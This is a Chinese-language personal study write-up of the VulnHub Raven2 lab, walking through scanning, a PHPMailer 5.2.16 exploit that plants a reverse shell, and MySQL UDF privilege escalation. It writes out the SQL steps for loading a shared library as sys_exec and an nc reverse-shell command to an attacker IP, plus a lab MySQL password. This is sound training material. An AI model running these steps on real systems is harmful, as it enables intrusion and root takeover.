vulnhub之raven2

仅做个人学习笔记使用

目录

一、主机发现

二、端口扫描

三、服务版本探测

四、信息收集

1.一直请求资源

2.常规看源码

五、扫目录

六、phpmailer

七、mysql之udf提权

1.信息收集

2.udf提权

3.步骤


一、主机发现

vulnhub之raven2_第1张图片

二、端口扫描

vulnhub之raven2_第2张图片

三、服务版本探测

常规22,80端口。

111这是个没看懂

42689 开放了远程进程调用协议

vulnhub之raven2_第3张图片

四、信息收集

1.一直请求资源

和原来一样就是请求了国外某些站点资源,导致了无法正常加载,挂个梯子就行。要是用到burp,就挂两层。

就是个保安公司界面

vulnhub之raven2_第4张图片

2.常规看源码

看接口,源码泄露,有无隐藏目录,都无。

五、扫目录

最基本信息就是wordpress建站

vulnhub之raven2_第5张图片

1. /vendor

3,4,5个文件都提到了PHPMailer,readme是自述文件,里面介绍了phpmailer是个php的邮件传输的类,。而security则提到了他的历史漏洞。changelog讲述变迁日志。

尝试从phpmailer进行突破

vulnhub之raven2_第6张图片

(1)flag1

vulnhub之raven2_第7张图片

六、phpmailer

因为从上面文件中可以得知版本是5.2.16,所以这几个都去试一下。

1.40974.py

40974.py是可以用的。对目标路径写入反弹shell文件。

vulnhub之raven2_第8张图片

注意: 使用前需要先更改文件内容

(1)改回连地址

(2)写入后门文件路径

(3)目标ip

也可以改个文件名

2.访问触发

3.反弹shell

七、mysql之udf提权

当我们信息收集时,发现有泄露的mysql账号密码,

检查进程时,又发现mysql是以root的属主运行的,所以可以利用mysql来提权,

1.信息收集

root     R@v3nSecurity

vulnhub之raven2_第9张图片

2.udf提权

udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能。

攻击者通过编写调用cmd或者shell的udf.dll文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。

3.步骤

(1)找到kali自带的udf提权链接库文件.so

vulnhub之raven2_第10张图片

(2)64.so的传到靶机上

最好放到/tmp下

(3)查看插件路径

show variables like '%plugin%';

(4)通过链接库文件写入数据库

使用系统数据库,创建一个表,写入链接库文件数据。

use mysql;

create table a(line blob);

insert into a values(load_file('/tmp/x.so'));

(5)再将链接库文件写入插件位置

select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';

(6)创建新函数

create function sys_exec returns integer soname 'x.so';

 (7)执行反弹shell

select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');

vulnhub之raven2_第11张图片

你可能感兴趣的:(Vulnhub,web安全,安全,服务器,mysql)